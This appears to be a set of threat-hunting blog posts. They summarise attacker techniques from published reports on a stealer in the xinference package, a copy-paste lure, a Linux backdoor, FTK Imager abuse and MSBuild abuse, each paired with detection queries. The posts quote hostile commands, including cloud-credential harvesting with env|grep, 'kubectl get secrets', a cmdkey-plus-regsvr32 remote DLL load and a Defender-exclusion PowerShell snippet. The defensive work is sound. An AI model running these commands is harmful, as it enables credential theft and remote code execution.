Know Your Adversary

Hello everyone! What do I know about stealers? They seem to be very noisy! And today, we’ll once again see that in action using TeamPCP (Haze Wolf) as an example. This time , the stealer was implanted by attackers into three versions of the xinference package (2.6.0, 2.6.1, and 2.6.2). Essentially, it collects SSH keys, various credentials, environment variables, crypto wallets, and much more, then uses cURL for exfiltration. Let’s take a look at a couple of techniques the attackers used to obtain credentials. For example, they were interested in data stored in environment variables: env | grep AWS_ env | grep -i google env | grep -i gcloud env | grep -i azure This looks fairly suspicious from a detection perspective: event_type: processcreate* AND proc_file_path: "env" AND cmdline: ("grep" AND ("aws_" OR "google" OR "azure" OR "gcloud")) Another technique was abusing kubectl to obtain credentials: kubectl get secrets --all-n...

Hello everyone! Today we’re going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004). This time, according to the report , the attackers prompted the victim to run the following command: C:\WINDOWS\system32\cmd.exe /c cmdkey /add:151.245.195[.]142 /user:guest && start regsvr32 /s \\151.245.195[.]142\hi\demo.dll & REM I am not a robot – Cloudflare ID: d7f5a3335794c434 As you can see, before registering a malicious library from a remote server using regsvr32.exe , the attackers use cmdkey.exe to store credentials for accessing that server. And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to the Windows Credential Manager: event_type: "processcreatewin" AND proc_file_path: "cmdkey.exe" AND cmdline: "add" See you soon!

Hello everyone! Another group has started using social engineering to deliver a Linux backdoor - though in this case, they essentially rewrote a Windows version of it. Let’s take a look at the techniques they used and how they can be detected or proactively hunted. This time, the source of information is a report by the Symantec and Carbon Black Threat Hunter Team on a group called Harvester . To disguise a malicious ELF file, the attackers used the Masquerade File Type (T1036.008) technique by giving the malicious file a “. pdf” extension—for example, “Details Format. pdf”. As you can see, there’s a space after the dot, which creates an opportunity for detection: Look for events involving the creation or execution of suspicious files with the “. pdf” extension. The attackers used two persistence methods on the compromised system. First, the GoGra backdoor creates a new service at ~/.config/systemd/user/userservice ( Systemd Service (T1543.002) ). Second, it creates an autostart entr...

Hello everyone! Today we’ll talk about another forensic tool that attackers used in the context of the Impair Defenses technique: Disable or Modify Tools (T1562.001) . Once again, the topic is ransomware. This time, we’re looking at the STAC4713 cluster, which distributes the PayoutsKing ransomware. To add exclusions to Windows Defender, the attackers used FTK Imager - a forensic tool designed for creating disk images. The key point is that during installation, this tool allows a selected path to be added to exclusions, which is exactly what the attackers exploited. The following command is executed: powershell -command $ExclusionType;$ExclusionFile = '"ExterroExclusions.txt"';if(Test-Path -path $ExclusionFile ){ $Exclusions = Get-Content $ExclusionFile; foreach ($Item in $Exclusions ) { $ItemTrimmed = $Item.trim(); if($Item.length -gt 0){ if($ItemTrimmed.StartsWith('-')) { $ExclusionType = $ItemTrimmed; Write-Host $ExclusionType; } elseif ( !($ItemTrimmed.St...

Hello everyone! Today we’ll take a look at a creative implementation of a very popular technique - Spearphishing Link (T1566.002) . According to this research , in February 2026 the TA416 cluster was distributing phishing emails containing links that led to Google Drive or compromised SharePoint instances. These links hosted archives that contained a renamed MSBuild executable (for example, Invitation_Letter_No.02_2026 ) along with a CSPROJ project file, which is what actually got executed after launch - MSBuild by default looks for the corresponding project file in the current directory. A successful execution resulted in the download of three files, which were later used to implement the DLL sideloading technique. Despite the attackers’ creative approach, detecting this kind of MSBuild abuse is fairly straightforward. For example: event_type: "processcreatewin" AND proc_file_originalfilename: "msbuild.exe" AND NOT proc_file_path: "msbuild.exe" See you s...

Hello everyone! Today we’re going to talk about collecting data from compromised systems, and we’ll look at an example of the technique Archive Collected Data: Archive via Utility (T1560.001) . The example comes from a Microsoft Threat Intelligence report on the activity of the Storm-1175 cluster, which is associated with the distribution of the Medusa ransomware. Despite the attackers using zero-day vulnerabilities to gain initial access, most of their tactics, techniques, and procedures were fairly trivial. Nevertheless, one of the tools caught my attention. To collect data for later publication on DLS, the attackers used Bandizip — a legitimate file archiving tool. This tool is not encountered very often and is quite suitable for proactive hunting, for example: event_type: "processcreatewin" AND proc_file_productname: "bandzip" See you soon!